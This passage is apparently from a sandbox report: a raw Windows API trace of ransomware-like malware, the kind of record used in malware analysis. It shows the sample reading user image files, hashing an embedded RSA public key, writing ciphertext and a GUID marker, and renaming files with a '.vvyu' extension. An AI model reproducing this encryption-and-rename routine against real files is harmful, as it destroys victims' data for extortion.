(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39eb0 [0193.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e50 [0193.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0193.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e68 [0193.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e38 [0193.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ec8 [0193.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0193.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e98 [0193.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e80 [0193.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ee0 [0193.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e80 [0193.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0193.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0193.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e50 [0193.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0193.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0193.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0193.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41e78 | out: hHeap=0x6a0000) returned 1 [0193.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.173] WriteFile (in: hFile=0x584, lpBuffer=0x2d47778*, nNumberOfBytesToWrite=0x12ba7, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d47778*, lpNumberOfBytesWritten=0x30ffb14*=0x12ba7, lpOverlapped=0x0) returned 1 [0193.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47778 | out: hHeap=0x6a0000) returned 1 [0193.174] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x12bac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.174] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.176] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.176] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.176] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.176] CloseHandle (hObject=0x584) returned 1 [0193.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0193.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d47778 [0193.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0193.179] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\cH1Zz4OF5OqujiOEN9.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\ch1zz4of5oqujioen9.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\cH1Zz4OF5OqujiOEN9.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\ch1zz4of5oqujioen9.png.vvyu")) returned 1 [0193.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47778 | out: hHeap=0x6a0000) returned 1 [0193.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.182] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0193.185] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9129a0, ftCreationTime.dwHighDateTime=0x1d89af4, ftLastAccessTime.dwLowDateTime=0xc6652fe0, ftLastAccessTime.dwHighDateTime=0x1d8a634, ftLastWriteTime.dwLowDateTime=0xc6652fe0, ftLastWriteTime.dwHighDateTime=0x1d8a634, nFileSizeHigh=0x0, nFileSizeLow=0xf4ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dH_l_Ueln9J1Ttp1P51.gif", cAlternateFileName="DH_L_U~1.GIF")) returned 1 [0193.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0193.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.186] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\dH_l_Ueln9J1Ttp1P51.gif") returned=".gif" [0193.186] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\dH_l_Ueln9J1Ttp1P51.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\dh_l_ueln9j1ttp1p51.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.188] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=62635) returned 1 [0193.188] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.190] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf485, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.191] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.193] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.193] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xf4ab, lpOverlapped=0x0) returned 1 [0193.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.194] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0193.195] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.195] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.195] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.195] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.195] GetLastError () returned 0x0 [0193.196] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.196] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0193.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.196] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.196] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.196] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4b0) returned 0x2d47778 [0193.197] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41e78 [0193.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e20 [0193.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41ec0 [0193.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e38 [0193.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e68 [0193.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ec8 [0193.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e80 [0193.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.198] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0193.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ec8 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e80 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39e68 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0193.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: 